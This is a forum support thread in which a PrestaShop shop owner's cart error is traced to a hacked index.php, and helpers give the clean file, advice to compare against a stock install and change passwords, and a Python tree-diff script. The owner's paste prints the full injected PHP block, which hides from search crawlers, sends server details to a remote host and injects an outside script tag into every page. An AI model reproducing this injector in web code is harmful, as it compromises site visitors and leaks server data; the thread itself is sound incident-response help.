
(SOLVED) cart error



It's strange... I don't know whether you have some "corrupt" file (or you are the victim of an attack...), but it adds

<script type="text/javascript" src="http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294"></script>

at the end, and that triggers the JavaScript error.

Look at the file blockcart-json.tpl, which is in the blockcart module. If you see anything odd at the end, replace it with the stock one.

E.g. https://github.com/PrestaShop/blockcart/blob/master/blockcart-json.tpl

Edited by Enrique Gómez (see edit history)

Actually,

<script type="text/javascript" src="http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294"></script>

is being added to every page... I don't know, check the .htaccess.

As for replacing the file with the stock one, it won't let me. And as for the .htaccess, what should I look at? Thanks


Copy and paste the .htaccess here, or attach it

  

 
 
# ~~start~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again
# .htaccess automaticaly generated by PrestaShop e-commerce open-source solution
 
<IfModule mod_rewrite.c>
<IfModule mod_env.c>
SetEnv HTTP_MOD_REWRITE On
</IfModule>
 
 
# Disable Multiviews
Options -Multiviews
 
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule . - [E=REWRITEBASE:/]
RewriteRule ^api/?(.*)$ %{ENV:REWRITEBASE}webservice/dispatcher.php?url=$1 [QSA,L]
 
# Images
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$1$2$3.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$1$2$3$4.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$1$2$3$4$5.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$1$2$3$4$5$6.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$1$2$3$4$5$6$7.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$6/$1$2$3$4$5$6$7$8.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$6/$7/$1$2$3$4$5$6$7$8$9.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])([0-9])(\-[_a-zA-Z0-9-]*)?(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/p/$1/$2/$3/$4/$5/$6/$7/$8/$1$2$3$4$5$6$7$8$9$10.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^c/([0-9]+)(\-[\.*_a-zA-Z0-9-]*)(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/c/$1$2$3.jpg [L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^c/([a-zA-Z_-]+)(-[0-9]+)?/.+\.jpg$ %{ENV:REWRITEBASE}img/c/$1$2.jpg [L]
# AlphaImageLoader for IE and fancybox
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^images_ie/?([^/]+)\.(jpe?g|png|gif)$ js/jquery/plugins/fancybox/images/$1.$2 [L]
 
# Dispatcher
RewriteCond %{REQUEST_FILENAME} -s [OR]
RewriteCond %{REQUEST_FILENAME} -l [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^.*$ - [NC,L]
RewriteCond %{HTTP_HOST} ^www.regalosnavarra.com$
RewriteRule ^.*$ %{ENV:REWRITEBASE}index.php [NC,L]
</IfModule>
 
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType image/gif "access plus 1 month"
ExpiresByType image/jpeg "access plus 1 month"
ExpiresByType image/png "access plus 1 month"
ExpiresByType text/css "access plus 1 week"
ExpiresByType text/javascript "access plus 1 week"
ExpiresByType application/javascript "access plus 1 week"
ExpiresByType application/x-javascript "access plus 1 week"
ExpiresByType image/x-icon "access plus 1 year"
</IfModule>
 
FileETag INode MTime Size
<IfModule mod_deflate.c>
<IfModule mod_filter.c>
AddOutputFilterByType DEFLATE text/html text/css text/javascript application/javascript application/x-javascript
</IfModule>
</IfModule>
 
#If rewrite mod isn't enabled
ErrorDocument 404 /index.php?controller=404
 
# ~~end~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again

The .htaccess is fine...

What is clear is that any request (other than loading static content) ends up with that JavaScript code appended at the end.

Can you post the index.php file from the installation root?

OK, I'll send it to you. Thanks for everything. Regards

 

 

<?php
/*
* 2007-2013 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2013 PrestaShop SA
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
 
require(dirname(__FILE__).'/config/config.inc.php');
Dispatcher::getInstance()->dispatch();
 
 
#8557cd#
if( empty( $sh ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }
        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }
 
        if( empty( $__var_to_echo ) ) {
            $sh09['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
            $sh09['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
            $sh09['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
            $sh09['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
            $sh09['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
            $sh09['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
            $sh09['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
 
            $sh = __url_get_contents(
                $sh . "?fid=13994820&info=" . http_build_query( $sh09 ) . "&no=1",
                1
            );
            $sh = "<script type=\"text/javascript\" src=\"http://www.healthnbeautyblog.com/wp-content/6mjzhvnq.php?id=9419294\"></script>";
 
            echo $sh;
        }
    }
}
#/8557cd#

Indeed, your site has been "hacked".

The file should contain only

<?php
/*
* 2007-2013 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.or...ses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
*  @author PrestaShop SA <[email protected]>
*  @copyright  2007-2013 PrestaShop SA
*  @license    http://opensource.or...ses/osl-3.0.php  Open Software License (OSL 3.0)
*  International Registered Trademark & Property of PrestaShop SA
*/
 
require(dirname(__FILE__).'/config/config.inc.php');
Dispatcher::getInstance()->dispatch();
 

Well, it looks like that's where your problem is. Leave it as it comes by default:

<?php
/*
* 2007-2014 PrestaShop
*
* NOTICE OF LICENSE
*
* This source file is subject to the Open Software License (OSL 3.0)
* that is bundled with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://opensource.org/licenses/osl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to [email protected] so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
* versions in the future. If you wish to customize PrestaShop for your
* needs please refer to http://www.prestashop.com for more information.
*
* @author PrestaShop SA <[email protected]>
* @copyright 2007-2014 PrestaShop SA
* @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
* International Registered Trademark & Property of PrestaShop SA
*/

require(dirname(__FILE__).'/config/config.inc.php');
Dispatcher::getInstance()->dispatch();


Take a look at this post

http://www.prestashop.com/forums/topic/322456-help-prestashop-malwarevirus/

In principle, when a site has been infected, the ideal approach would be to download the whole site to your hard drive and compare it against the folder of a clean PrestaShop (same version) with a tool such as Beyond Compare or WinMerge, to see the changes in the files and detect infected code.

And of course change all the FTP passwords, etc.

And keep an eye out in case the security hole comes from the hosting.

It's a real pain, and it's more common than it seems.
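
The comparison recommended in this post (live copy against a clean PrestaShop of the same version), sketched as an added example that is not part of the original thread: it flags files whose stock content is intact but has something appended, as happened to index.php here, and recognises the `#8557cd#` ... `#/8557cd#` marker shape. The function names, the extension list and the sample trees are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Marker pair shaped like the one in this thread: "#8557cd#" ... "#/8557cd#".
MARKER = re.compile(rb"#([0-9a-f]{6})#.*?#/\1#", re.S)
# Assumption: names/extensions the web server may execute or interpret.
CODE_EXT = {".php", ".phtml", ".js", ".tpl", ".htaccess"}

def load(path):
    """File bytes with line endings normalised, so a text-mode FTP copy is not a diff."""
    return path.read_bytes().replace(b"\r\n", b"\n").rstrip()

def tree(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}

def is_code(rel):
    p = Path(rel)
    return p.suffix.lower() in CODE_EXT or p.name.lower() in CODE_EXT

def describe(data):
    m = MARKER.search(data)
    return f"marker block #{m.group(1).decode()}#" if m else f"{len(data)} bytes to review"

def compare_trees(clean_root, live_root):
    """Return sorted (status, relative_path, detail) findings for the live copy."""
    clean, live = tree(clean_root), tree(live_root)
    findings = []
    for rel in sorted(set(clean) | set(live)):
        if rel not in live:
            findings.append(("missing", rel, ""))
        elif rel not in clean:
            if is_code(rel):  # uploaded images are expected in a live shop; new code is not
                findings.append(("added", rel, describe(load(live[rel]))))
        else:
            ref, cur = load(clean[rel]), load(live[rel])
            if cur == ref:
                continue
            # Stock content intact with something after it: the index.php case here.
            status = "appended" if cur.startswith(ref) else "modified"
            extra = cur[len(ref):] if status == "appended" else cur
            findings.append((status, rel, describe(extra)))
    return findings

def demo():
    """Constructed sample trees: stock index.php vs. a live copy with planted changes."""
    base = Path(tempfile.mkdtemp())
    stock = b"<?php\nrequire(dirname(__FILE__).'/config/config.inc.php');\n"
    for side in ("clean", "live"):
        (base / side / "img").mkdir(parents=True)
        (base / side / "index.php").write_bytes(stock)
    tail = b"\r\n#8557cd#\r\n/* placeholder for injected code */\r\n#/8557cd#\r\n"
    (base / "live" / "index.php").write_bytes(stock.replace(b"\n", b"\r\n") + tail)
    (base / "live" / "img" / "logo.jpg").write_bytes(b"\xff\xd8")  # not code: ignored
    (base / "live" / "img" / "x.php").write_bytes(b"<?php /* placeholder */")
    return compare_trees(base / "clean", base / "live")

if __name__ == "__main__":
    for finding in demo():
        print(*finding, sep="\t")
```

Modules and themes installed on the shop but absent from the stock release will be reported as added; compare those against their own original packages.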


Thanks, I'll change the passwords just in case. By the way, I replaced the file and now it does work fine, but when I replaced it all the slider images disappeared... does that have anything to do with it?


I don't think so...

If you consider the issue solved, edit the topic title by editing the first message: click Edit, then "Use full editor", and add the word "Solved" to the title.

And if I helped you, hit like ;)

Regards

The slider thing was something else, to do with my browser. Thanks a lot for everything; I consider the topic solved. Regards
